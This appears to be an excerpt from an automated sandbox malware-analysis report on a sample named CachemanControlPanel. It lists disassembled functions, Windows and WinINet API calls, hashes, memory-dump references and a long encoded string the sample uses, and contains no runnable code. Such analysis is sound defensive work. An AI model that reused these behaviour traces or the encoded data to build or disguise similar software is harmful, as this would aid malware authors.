                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Alloc$CountCurrentHeapThreadTickValue
                                                        • String ID:
                                                        • API String ID: 2417412593-0
                                                        • Opcode ID: 9be7f52909bc8a29f2b41f49fde044e1e4e4ba8de77024330408803f1210213c
                                                        • Instruction ID: e17548aa91f972a2254ef31a49f3085a23ab91ff7a8570beac815e9b82d9ecd2
                                                        • Opcode Fuzzy Hash: 9be7f52909bc8a29f2b41f49fde044e1e4e4ba8de77024330408803f1210213c
                                                        • Instruction Fuzzy Hash: 90E052B1401658EFDB14BF60FE09B657AE4EB48716F052635F801D52B0C7B909858B9D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00418710: TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040739F
                                                        • PathFileExistsW.SHLWAPI(?,00000001,00000000,00000000,?,?,?,0043012E,00000004,00000001,00000008,00430D10,?,00000000,00000000,00000000), ref: 00407519
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 004185B0: TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                          • Part of subcall function 004185B0: RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                          • Part of subcall function 004167D0: _wcsncoll.MSVCRT ref: 00416833
                                                          • Part of subcall function 004167D0: memmove.MSVCRT ref: 004168C1
                                                          • Part of subcall function 004167D0: wcsncpy.MSVCRT ref: 004168D9
                                                          • Part of subcall function 004185B0: HeapReAlloc.KERNEL32(02A80000,00000000,?,?), ref: 0041860C
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                          • Part of subcall function 004186A0: TlsGetValue.KERNEL32(00000022,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404B45,00000001,00000001,00000006,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 004186AA
                                                          • Part of subcall function 0040A212: TlsGetValue.KERNEL32(00000000,0040111B,0043101C,FFFFFFFF,00000002,00000000,00000000,00000001,00000020,00000000,00000000,0043383C,00000000,00000000,00000000,0000000C), ref: 0040A219
                                                          • Part of subcall function 00408683: InternetOpenW.WININET(00000000,00000001,00430024,00430024,00000000), ref: 004087AB
                                                          • Part of subcall function 00408683: InternetSetOptionW.WININET(00000000,00000002,000003E8,00000004), ref: 004087C7
                                                          • Part of subcall function 00408683: InternetConnectW.WININET(00000000,00000000,00000000,00430024,00430024,00000003,00000000,00000000), ref: 00408877
                                                          • Part of subcall function 00408683: HttpOpenRequestW.WININET(00000000,00000000,00000000,00000000,00000000,00430024,00430024,00000000), ref: 004088D4
                                                          • Part of subcall function 00408683: HttpAddRequestHeadersW.WININET(?,00000000,00000000,?), ref: 00408936
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$Internet$ErrorExistsFileHeapHttpLastOpenPathRequest$AllocAllocateConnectHeadersOption_wcsncollmemmovewcslenwcsncpy
                                                        • String ID: &bc=$?prf=1
                                                        • API String ID: 3838261891-718013633
                                                        • Opcode ID: 5c2105a1db9c05ee78b19dc8fb3a6b2f6f2924e686be54ab30b3610594193cbf
                                                        • Instruction ID: 136c6bcb7b3fdd978dd739e794595f8712a02167c63226c769ced1a24834e022
                                                        • Opcode Fuzzy Hash: 5c2105a1db9c05ee78b19dc8fb3a6b2f6f2924e686be54ab30b3610594193cbf
                                                        • Instruction Fuzzy Hash: A95162B55043017BD600BF61DC82E6F76EAEB84708F108C3EB544A51A2DA3DDD85972E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,-00000400,00408997,00000000,?,FFFFFFFF), ref: 004179DE
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,-00000400,00408997,00000000,?,FFFFFFFF), ref: 00417A0E
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,-00000400,00408997,00000000,?,FFFFFFFF), ref: 00417A23
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00417975
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 626452242-3176450862
                                                        • Opcode ID: 73f52a8bba5e60f559d4018ae96e36a316d1539bd508eccb86cb0731838b6358
                                                        • Instruction ID: 9b1de5452ca8d69f68347f153090abba6648ada4c3b91980cb872940dea89594
                                                        • Opcode Fuzzy Hash: 73f52a8bba5e60f559d4018ae96e36a316d1539bd508eccb86cb0731838b6358
                                                        • Instruction Fuzzy Hash: 9D3126367483056AE7308A698C81FBB73B9DFD4B50F20441BFA405F3C0EAB56D458229
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 004167D5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: _wcsncollmemmovewcsncpy
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 2558734708-3176450862
                                                        • Opcode ID: e2c284a2c59b299eaf4ee511ff30d75b7021ea62174bfc68ac34a2f1a594b971
                                                        • Instruction ID: 5774c2a71589d278255316321f3ac6f3064f5d93ebf46a40af74692c885d908c
                                                        • Opcode Fuzzy Hash: e2c284a2c59b299eaf4ee511ff30d75b7021ea62174bfc68ac34a2f1a594b971
                                                        • Instruction Fuzzy Hash: 1D31A2369053159BC720BF548880AFB73A5FF84384F16492FE8C557351EB68ED82C7AA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00417E13: EnterCriticalSection.KERNEL32(00001020,00000000,?,?,0040CD05,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000,00000000,00000000,00401B6E), ref: 00417E1E
                                                          • Part of subcall function 00417E13: LeaveCriticalSection.KERNEL32(00001020,?,?,0040CD05,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000,00000000,00000000,00401B6E,004338C8), ref: 00417E99
                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000), ref: 0040CD23
                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000005,00000000,00000000,?,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000), ref: 0040CD3F
                                                        • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004091B0,FFFFFFFF,?,00000000,00000000,00000000,00401B6E,004338C8,00000000), ref: 0040CD62
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040CCF0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CreateCriticalFileSection$AllocEnterHeapLeave
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 49537883-3176450862
                                                        • Opcode ID: 1c34f782a05ac56bf6410788316c331a96aab0ada6e89efa1cf56f22bd693a81
                                                        • Instruction ID: cd39cbdd33df1d8f29d3cd003fd24e5ddc1ce8780a56f5fa6b8125932503c6df
                                                        • Opcode Fuzzy Hash: 1c34f782a05ac56bf6410788316c331a96aab0ada6e89efa1cf56f22bd693a81
                                                        • Instruction Fuzzy Hash: D2218E71200740ABD2305F1AAC88F17BEF8EFC5B60F11473AF565A26E0D67598558B68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00417C63: TlsGetValue.KERNEL32(?,0040B326,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=,00000000,00000000), ref: 00417C6A
                                                          • Part of subcall function 00417C63: HeapAlloc.KERNEL32(00000008,00000000,?,0040B326,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=), ref: 00417C85
                                                          • Part of subcall function 00417C63: TlsSetValue.KERNEL32(00000000,?,0040B326,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,004057C5,00001000,00000000,00000000,00404EE2,00000000,00000000,00000000,&env=,00000000), ref: 00417C94
                                                        • wcschr.MSVCRT ref: 0040B2D0
                                                        • wcslen.MSVCRT ref: 0040B2E1
                                                        • wcscpy.MSVCRT ref: 0040B302
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040B2B3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$AllocHeapwcschrwcscpywcslen
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 2703276150-3176450862
                                                        • Opcode ID: 2830058facb7e3753524095e2828f86d441b866023264cd3fe8054b513c27505
                                                        • Instruction ID: 38b6ae4d63d667d9dbafe7c5a5129ea52d611c4ce83951e441f3a5b49696a6c8
                                                        • Opcode Fuzzy Hash: 2830058facb7e3753524095e2828f86d441b866023264cd3fe8054b513c27505
                                                        • Instruction Fuzzy Hash: CCF022370087007BD229AB66EC8AC6B7398DF84370311813FF504AB281EF399801839C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040C735
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectorywcslenwcsncpy
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 961886536-3176450862
                                                        • Opcode ID: 7305a74c3504d862b0693f66dbc2e7e676aa5082e07282e2ac24c4bf3e44f99f
                                                        • Instruction ID: 3ba95a8e9af320a23fcbf282ae6ba797452cbe2538eccb5bb49096544e0cffdf
                                                        • Opcode Fuzzy Hash: 7305a74c3504d862b0693f66dbc2e7e676aa5082e07282e2ac24c4bf3e44f99f
                                                        • Instruction Fuzzy Hash: 9C01A7B4400219DACB28DB64CCC9AAA73A8EF04300F2043BBE515E31D1E7388A94DF4A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 004188D0: TlsGetValue.KERNEL32(00000022,00001000,00000000,00000000), ref: 004188DC
                                                          • Part of subcall function 004188D0: RtlReAllocateHeap.NTDLL(02A80000,00000000,?,?), ref: 00418937
                                                        • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401A80,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00430236), ref: 0040AB6F
                                                        • wcscmp.MSVCRT ref: 0040AB7D
                                                        • memmove.MSVCRT ref: 0040AB95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
